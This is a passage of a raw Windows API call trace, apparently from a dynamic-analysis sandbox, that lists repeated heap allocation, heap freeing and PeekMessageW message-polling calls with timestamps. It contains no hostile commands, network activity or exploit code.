[0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d78 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d00 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d18 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4f8 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.344] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed268 [0026.344] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4e8 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4d8 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4e8 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d18 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.345] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4d8 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4d8 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.345] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.345] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.346] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.346] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.346] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.347] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.347] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.347] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.348] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.348] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.348] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.349] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.349] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.349] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af508 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.350] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889400 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af508 | out: hHeap=0x770000) returned 1 [0026.350] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.350] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af508 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d30 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889400 [0026.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0026.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d30 | out: 